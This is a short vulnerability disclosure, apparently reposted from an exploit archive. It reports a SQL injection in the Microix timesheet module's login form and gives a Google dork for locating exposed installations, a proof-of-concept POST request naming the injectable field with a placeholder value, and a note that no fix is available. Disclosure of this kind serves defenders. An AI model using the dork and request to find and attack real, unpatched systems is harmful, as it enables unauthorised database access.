Microix Timesheet Module SQL Injection

2016.09.24
Credit: Anthony Cole
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Microix timesheet module SQL Injection # Google Dork: "Copyright by Microix" inurl:"/microixcloud/" # Date: 2016-09-06 # Software Link: http://www.microix.net/workflow-modules/timesheet-module/ # Exploit Author: Anthony Cole # Contact: http://twitter.com/acole76 # Website: http://www.3fforensics.com/ # CVE: # Category: webapps 1. Description Microix timeclock is vulnerable to a SQL injection. The field that is injectable is: ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID Initial contact attempt: 08/22/2016 2nd attempt: 08/29/2016 3rd attempt: 09/05/2016 4th attempt: 09/21/2016 2. Proof of Concept POST /microixcloud/ HTTP/1.1 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded __VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin 3. Solution: None


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top